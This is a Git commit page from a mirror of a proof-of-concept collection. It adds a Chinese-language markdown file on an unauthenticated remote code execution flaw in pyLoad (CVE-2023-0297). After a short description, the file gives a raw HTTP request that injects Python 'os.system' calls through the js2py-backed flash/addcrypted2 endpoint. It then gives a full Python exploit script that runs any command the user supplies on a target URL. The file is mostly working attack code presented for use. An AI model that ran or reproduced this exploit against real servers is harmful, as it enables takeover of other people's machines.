admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Create pyLoad远程代码执行漏洞.md

Browse Source
This commit is contained in:
wy876 2023-11-23 21:32:32 +08:00 committed by GitHub
parent 52ddc1666d
commit ab48be5a3e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 73 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

73
pyLoad远程代码执行漏洞.md Normal file
View File

@ -0,0 +1,73 @@
## pyLoad远程代码执行漏洞
pyLoad是一个用 Python 编写的免费和开源下载管理器可用于NAS、下一代路由器、无头家庭服务器以及任何能够连接到互联网并支持 Python 编程语言的设备。
pyLoad 存在代码注入漏洞,未经身份验证的攻击者可以通过滥用 js2py 功能执行任意 Python 代码。
## poc
```
POST flash/addcrypted2 HTTP/1.1
Host:127.0.0.1
Content-type: application/x-www-form-urlencoded
jk=pyimport%20os;os.system("id");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa
```
## exp脚本
```python
# Exploit Title: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
# Date: 06-10-2023
# Credits: bAu @bauh0lz
# Exploit Author: Gabriel Lima (0xGabe)
# Vendor Homepage: https://pyload.net/
# Software Link: https://github.com/pyload/pyload
# Version: 0.5.0
# Tested on: Ubuntu 20.04.6
# CVE: CVE-2023-0297
import requests, argparse
parser = argparse.ArgumentParser()
parser.add_argument('-u', action='store', dest='url', required=True, help='Target url.')
parser.add_argument('-c', action='store', dest='cmd', required=True, help='Command to execute.')
arguments = parser.parse_args()
def doRequest(url):
try:
res = requests.get(url + '/flash/addcrypted2')
if res.status_code == 200:
return True
else:
return False
except requests.exceptions.RequestException as e:
print("[!] Maybe the host is offline :", e)
exit()
def runExploit(url, cmd):
endpoint = url + '/flash/addcrypted2'
if " " in cmd:
validCommand = cmd.replace(" ", "%20")
else:
validCommand = cmd
payload = 'jk=pyimport%20os;os.system("'+validCommand+'");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa'
test = requests.post(endpoint, headers={'Content-type': 'application/x-www-form-urlencoded'},data=payload)
print('[+] The exploit has be executeded in target machine. ')
def main(targetUrl, Command):
print('[+] Check if target host is alive: ' + targetUrl)
alive = doRequest(targetUrl)
if alive == True:
print("[+] Host up, let's exploit! ")
runExploit(targetUrl,Command)
else:
print('[-] Host down! ')
if(arguments.url != None and arguments.cmd != None):
targetUrl = arguments.url
Command = arguments.cmd
main(targetUrl, Command)
```